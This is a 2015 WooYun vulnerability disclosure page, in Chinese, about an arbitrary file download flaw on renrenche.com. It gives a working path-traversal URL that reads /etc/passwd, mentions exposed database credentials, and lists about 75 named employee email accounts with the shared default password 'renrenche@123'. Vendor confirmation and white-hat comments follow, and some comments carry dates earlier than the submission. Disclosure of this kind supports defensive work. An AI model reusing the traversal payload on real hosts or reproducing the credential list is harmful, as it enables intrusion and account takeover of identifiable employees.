当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132409

漏洞标题:人人车某处任意文件下载漏洞得到邮件密码影响内部信息安全

相关厂商:renrenche.com

漏洞作者: Busliv

提交时间:2015-08-16 21:51

修复时间:2015-09-30 22:08

公开时间:2015-09-30 22:08

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-16: 细节已通知厂商并且等待厂商处理中
2015-08-16: 厂商已经确认,细节仅向厂商公开
2015-08-26: 细节向核心白帽子及相关领域专家公开
2015-09-05: 细节向普通白帽子公开
2015-09-15: 细节向实习白帽子公开
2015-09-30: 细节向公众公开

简要描述:

腾讯领投,人人车获8500万美元C轮融资估值5亿刀】日前,二手车C2C交易平台人人车宣布完成了由腾讯战略领投的8500万美元C轮融资,包括雷军在内的上轮投资者亦有跟投,听说是被马化腾和雷军看中的男人,

详细说明:

url:http://report.renrenche.com/
问题点:

http://report.renrenche.com/?proc=2&resource=../../../../../../../etc/passwd


renren8.png


root权限,可以查看历史命令记录

renren.png

漏洞证明:

敏感信息
数据库账号密码

renren2.png


邮件账号密码

renren41.jpg


renren1.png


ps:贵公司的邮箱初始密码为renrenche@123
邮件弱口令

账号
密码
heqing@renrenche.com
renrenche@123
liuchuang@renrenche.com
renrenche@123
liuzuopeng@renrenche.com
renrenche@123
wangguangqing@renrenche.com
renrenche@123
wangxu01@renrenche.com
renrenche@123
zhaozichun@renrenche.com
renrenche@123
bululu@renrenche.com
renrenche@123
hubing@renrenche.com
renrenche@123
huchuanlong@renrenche.com
renrenche@123
luhuan@renrenche.com
renrenche@123
shenyang01@renrenche.com
renrenche@123
wangxu@renrenche.com
renrenche@123
zhaohuaiyue@renrenche.com
renrenche@123
hehuisen@renrenche.com
renrenche@123
panzhiwen@renrenche.com
renrenche@123
zhongleping@renrenche.com
renrenche@123
zhuozuquan@renrenche.com
renrenche@123
chenyi01@renrenche.com
renrenche@123
fuqiang@renrenche.com
renrenche@123
lijian01@renrenche.com
renrenche@123
lilei@renrenche.com
renrenche@123
wangxiaoqi@renrenche.com
renrenche@123
xiepanpan@renrenche.com
renrenche@123
zhangminjun@renrenche.com
renrenche@123
xianfeng@renrenche.com
renrenche@123
yangyang@renrenche.com
renrenche@123
chenyu@renrenche.com
renrenche@123
shijunyong@renrenche.com
renrenche@123
wangzhenhua@renrenche.com
renrenche@123
chenchao01@renrenche.com
renrenche@123
chenxinchao@renrenche.com
renrenche@123
gaoxiang@renrenche.com
renrenche@123
liangzhenhua@renrenche.com
renrenche@123
liudong@renrenche.com
renrenche@123
liupeng@renrenche.com
renrenche@123
liuyang01@renrenche.com
renrenche@123
sunmingyuan@renrenche.com
renrenche@123
suntao@renrenche.com
renrenche@123
zhangboye@renrenche.com
renrenche@123
zhangcheng@renrenche.com
renrenche@123
zhanglei01@renrenche.com
renrenche@123
zhangqiang@renrenche.com
renrenche@123
zhangwenqiang@renrenche.com
renrenche@123
zhanyanhong@renrenche.com
renrenche@123
caodongliang@renrenche.com
renrenche@123
caomin@renrenche.com
renrenche@123
dengzhenyu@renrenche.com
renrenche@123
tangming@renrenche.com
renrenche@123
yangrong@renrenche.com
renrenche@123
zhangzijing@renrenche.com
renrenche@123
zuopengzhi@renrenche.com
renrenche@123
caowenjun@renrenche.com
renrenche@123
hanmingfei@renrenche.com
renrenche@123
hanzhansheng@renrenche.com
renrenche@123
jiangjing@renrenche.com
renrenche@123
liqinyi@renrenche.com
renrenche@123
qibin@renrenche.com
renrenche@123
wuhongfei@renrenche.com
renrenche@123
chenfusen@renrenche.com
renrenche@123
chenguanghui@renrenche.com
renrenche@123
duanxiongwen@renrenche.com
renrenche@123
huwenhui@renrenche.com
renrenche@123
liaodonghui@renrenche.com
renrenche@123
lijiale@renrenche.com
renrenche@123
linyixin@renrenche.com
renrenche12345
pengzhenkang@renrenche.com
renrenche@123
wenyingyun@renrenche.com
renrenche@123
yangzehong@renrenche.com
renrenche@123
zengguorong@renrenche.com
renrenche@123
gongzhigeng@renrenche.com
renrenche@123
jianglong@renrenche.com
renrenche@123
wangmeng@renrenche.com
renrenche@123

修复方案:

新厂商,来个众测?

版权声明:转载请注明来源 Busliv@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-08-16 22:06

厂商回复:

非常非常感谢!水平非常高!多谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-07 19:49 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    同样的漏洞,差距咋就这么大?洞主真是心细机智。

  2. 2015-08-07 21:00 | Busliv ( 普通白帽子 | Rank:146 漏洞数:16 | to be,and to be)

    @疯狗 狗哥见笑了

  3. 2015-08-16 22:18 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这是个通用漏洞 洞主再提一个吧 有奖励

  4. 2015-08-16 22:50 | Busliv ( 普通白帽子 | Rank:146 漏洞数:16 | to be,and to be)

    @xsser 原来真是通用漏洞,感谢剑心妹子